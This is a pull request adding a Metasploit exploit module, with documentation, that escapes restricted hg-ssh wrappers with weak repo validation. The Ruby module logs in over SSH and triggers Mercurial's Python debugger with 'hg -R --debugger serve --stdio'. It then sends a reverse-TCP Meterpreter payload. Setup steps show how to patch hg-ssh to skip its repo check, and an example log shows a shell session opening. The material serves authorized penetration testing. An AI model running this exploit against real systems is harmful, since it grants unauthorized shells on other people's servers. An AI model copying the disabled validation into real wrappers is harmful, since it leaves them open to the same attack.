### PR TITLE
Add mercurial ssh exec

### DIFF
--- a/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
+++ b/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+[mercurial](https://www.mercurial-scm.org/downloads).
+
+This module was successfully tested against:
+
+Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
+
+## Vulnerable Server Setup Steps
+
+  1. Install mercurial on your test server
+  2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
+     - Replace "if repo in allowed paths:" with "if True:"
+     - Replace "cmd = ['-R', repo, 'serve', 'stdio']" with "cmd = ['-R', path, 'serve', 'stdio']"
+  3. Setup a user with SSH pubkey auth
+  4. Create a test repo in the users home directory and add a commit
+     - `mkdir -p repos/repo1`
+     - `cd repos/repo1`
+     - `echo "hello world" > README`
+     - `hg add README`
+     - `hg commit -m "Adds README"`
+  5. Restrict user in authorized_keys to hg-ssh binary only
+     - `command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY`
+  6. Verify SSH user can authenticate (should prompt and prevent a shell)
+     - `ssh user@192.168.10.99`
+  7. Verify SSH user commands are not allows (should prevent arbitrary commands)
+     - `ssh user@192.168.10.99 ifconfig`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use exploit/linux/ssh/mercurial_ssh_exec`
+  3. Do: `set RHOST <ip>`
+  4. Do: `set LHOST <ip>`
+  5. Do: `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
+  6. Do: `exploit`
+  7. You should get a shell.
+
+## Scenarios
+
+### Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
+
+```
+msf exploit(mercurial_ssh_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.37:4444 
+[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
+[+] 192.168.10.99:22 - SSH connection is established.
+[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
+[*] Sending stage (39842 bytes) to 192.168.10.99
+[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
+```
+

--- a/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
+++ b/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
@@ -10,8 +10,8 @@ Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers w
 
   1. Install mercurial on your test server
   2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
-     - Replace "if repo in allowed paths:" with "if True:"
-     - Replace "cmd = ['-R', repo, 'serve', 'stdio']" with "cmd = ['-R', path, 'serve', 'stdio']"
+     - Replace `if repo in allowed paths:` with `if True:`
+     - Replace `cmd = ['-R', repo, 'serve', 'stdio']` with `cmd = ['-R', path, 'serve', 'stdio']`
   3. Setup a user with SSH pubkey auth
   4. Create a test repo in the users home directory and add a commit
      - `mkdir -p repos/repo1`

--- a/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
+++ b/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
@@ -4,7 +4,7 @@
 
 This module was successfully tested against:
 
-Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
+- Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
 
 ## Vulnerable Server Setup Steps
 

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -6,13 +6,14 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::SSH
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
       'Description'    => %q{
-        This module takes advantage of custom hg-ssh wrapper implementations that don'that
+        This module takes advantage of custom hg-ssh wrapper implementations that don't
         adequately validate parameters passed to the hg binary, allowing users to trigger a
         Python Debugger session, which allows arbitrary Python code execution.
       },
@@ -39,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RHOST(""),
         Opt::RPORT(22),
         OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
         OptString.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
@@ -52,14 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-  end
-
-  def rhost
-    datastore['RHOST']
-  end
-
-  def rport
-    datastore['RPORT']
   end
 
   def username

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -128,5 +128,4 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
   end
-
 end

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::SSH
 
   def initialize(info={})
@@ -40,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        Opt::RHOST(),
         Opt::RPORT(22),
         OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
         OptString.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
@@ -52,6 +52,14 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
   end
 
   def username

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -10,9 +10,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Mercurial custom hg-ssh wrapper Remote Code Exec",
+      'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
       'Description'    => %q{
-        This module takes advantage of custom hg-ssh wrapper implementations that don't 
+        This module takes advantage of custom hg-ssh wrapper implementations that don'that
         adequately validate parameters passed to the hg binary, allowing users to trigger a
         Python Debugger session, which allows arbitrary Python code execution.
       },
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PYTHON,
       'Targets'        => [ ['Automatic', {}] ],
       'Privileged'     => false,
-      'DisclosureDate' => "April 18 2017",
+      'DisclosureDate' => "Apr 18 2017",
       'DefaultTarget'  => 0
     ))
 

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -1,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Mercurial custom hg-ssh wrapper Remote Code Exec",
+      'Description'    => %q{
+        This module takes advantage of custom hg-ssh wrapper implementations that don't 
+        adequately validate parameters passed to the hg binary, allowing users to trigger a
+        Python Debugger session, which allows arbitrary Python code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'claudijd',
+        ],
+      'References'     =>
+        [
+          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload' => 'python/meterpreter/reverse_tcp',
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'Privileged'     => false,
+      'DisclosureDate' => "April 18 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(""),
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+        OptString.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def ssh_priv_key
+    File.read(datastore['SSH_PRIV_KEY_FILE'])
+  end
+
+  def exploit
+    factory = ssh_socket_factory
+    ssh_options = {
+      auth_methods: ['publickey'],
+      config: false,
+      use_agent: false,
+      key_data: [ ssh_priv_key ],
+      port: rport,
+      proxy: factory,
+      non_interactive:  true
+    }
+
+    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    print_status("#{rhost}:#{rport} - Attempting to login...")
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, username, ssh_options)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      print_good("SSH connection is established.")
+      ssh.open_channel do |ch|
+        ch.exec "hg -R --debugger serve --stdio" do |ch, success|
+          ch.on_extended_data do |ch, type, data|
+            if data.match(/entering debugger/)
+              print_good("Triggered Debugger (#{data})")
+              ch.send_data "#{payload.encoded}\n"
+            else
+              print_bad("Unable to trigger debugger (#{data})")
+            end
+          end
+        end
+      end
+
+      begin
+        ssh.loop unless session_created?
+      rescue Errno::EBADF => e
+        elog(e.message)
+      end
+    end
+  end
+
+end


### PR DESCRIPTION
This module allows a remote user with SSH access to an HG repository with a weak hg-ssh repo validation wrapper to break out of their restricted shell by tricking the HG binary to offering up a Python debugger session.

Reference: https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29

## Verification

List the steps needed to make sure this thing works

Setup a Target HG Service w/ weak repo validation
- [x] Install mercurial on your test server
- [x] Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
        Replace "if repo in allowed paths:" with "if True:"
        Replace "cmd = ['-R', repo, 'serve', 'stdio']" with "cmd = ['-R', path, 'serve', 'stdio']"
- [x] Setup a user with SSH pubkey auth
- [x] Create a test repo in the users home directory and add a commit
        mkdir -p repos/repo1
        cd repos/repo1
        echo "hello world" > README
        hg add README
        hg commit -m "Adds README"
- [x] Restrict user in authorized_keys to hg-ssh binary only
command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY
- [x] Verify SSH user can authenticate (should prompt and prevent a shell)
        ssh user@192.168.10.99
- [x] Verify SSH user commands are not allows (should prevent arbitrary commands)
ssh user@192.168.10.99 ifconfig

Setup MSF Client
- [x] Start `msfconsole`
- [x] `use exploit/linux/ssh/mercurial_ssh_exec`
- [x] `set RHOST 192.168.10.99`
- [x] `set USERNAME jsmith`
- [x] `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
- [x] `set LHOST 192.168.10.98`
- [x] `exploit`
- [x] **Verify** the thing does what it should
- [x] **Verify** the thing does not do what it should not
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

MSF Example Run

    msf exploit(mercurial_ssh_exec) > exploit

    [*] Started reverse TCP handler on 192.168.10.37:4444 
    [*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
    [+] 192.168.10.99:22 - SSH connection is established.
    [+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
    [*] Sending stage (39842 bytes) to 192.168.10.99
    [*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400